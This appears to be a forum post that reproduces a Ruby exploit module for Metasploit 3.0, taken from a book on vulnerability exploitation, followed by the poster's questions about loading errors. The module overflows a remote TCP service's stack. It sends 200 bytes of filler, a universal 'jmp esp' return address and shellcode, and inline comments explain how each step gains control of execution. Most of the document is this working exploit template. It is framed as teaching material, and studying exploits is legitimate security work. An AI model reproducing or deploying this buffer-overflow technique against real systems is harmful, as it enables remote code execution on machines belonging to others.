// It actually just uses the universal jump address: jmp esp at 0x7FFA4512
#/*****************************************************************************
# To be the apostrophe which changed "Impossible" into "I'm possible"!
#
#POC code of chapter 10.6 in book "Vulnerability Exploit and Analysis Technique"
#
#file name : test.rb
#author : failwest
#date : 2007.4.4
#description : used as a demo to show how to implement an exploit module for MSF
#Notice : create a sub directory named "failwest" in the exploit directory
# of MSF 3.0. For example, the default directory of exploit is
# "C:\Program Files\Metasploit\Framework3\framework\modules\exploits"
# this module should be put into
# "C:\Program Files\Metasploit\Framework3\framework\modules\exploits\failwest\"
#version : 1.0
#E-mail : failwest@gmail.com
#
# Only for educational purposes enjoy the fun from exploiting :)
#******************************************************************************/
require 'msf/core'

module Msf
class Exploits::Failwest::Test < Msf::Exploit::Remote
  include Exploit::Remote::Tcp   # provides connect/sock/disconnect and the RHOST/RPORT options

  # target['Ret'] in exploit() needs a target table, which the posted fragment omitted;
  # the address is the universal "jmp esp" at 0x7ffa4512 from the note above
  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'failwest test',
      'Author'        => 'failwest',
      'Targets'       => [['Windows, universal jmp esp 0x7ffa4512', { 'Ret' => 0x7ffa4512 }]],
      'DefaultTarget' => 0))
  end

  def exploit
    connect
    # 200 bytes of filler reach the saved return address, which is overwritten with the
    # little-endian ('V') jmp esp address; the shellcode follows so that esp points at it after ret
    attack_buf = 'a' * 200 + [target['Ret']].pack('V') + payload.encoded
    sock.put(attack_buf)
    handler
    disconnect
  end # end of exploit def
end # end of class def
end # end of module def
1. I found that I cannot run this script on my own machine: it does not show up in `show exploits`, and `use failwest/test` also gives an error: `[-] Failed to load module: failwest/test!` (the file location and so on are exactly as described in the book).
2. After saving the text containing the Ruby statements as a file with the .rb suffix, it cannot be executed from the "CMD shell": `ruby: No such file or directory -- aa.rb (LoadError)!`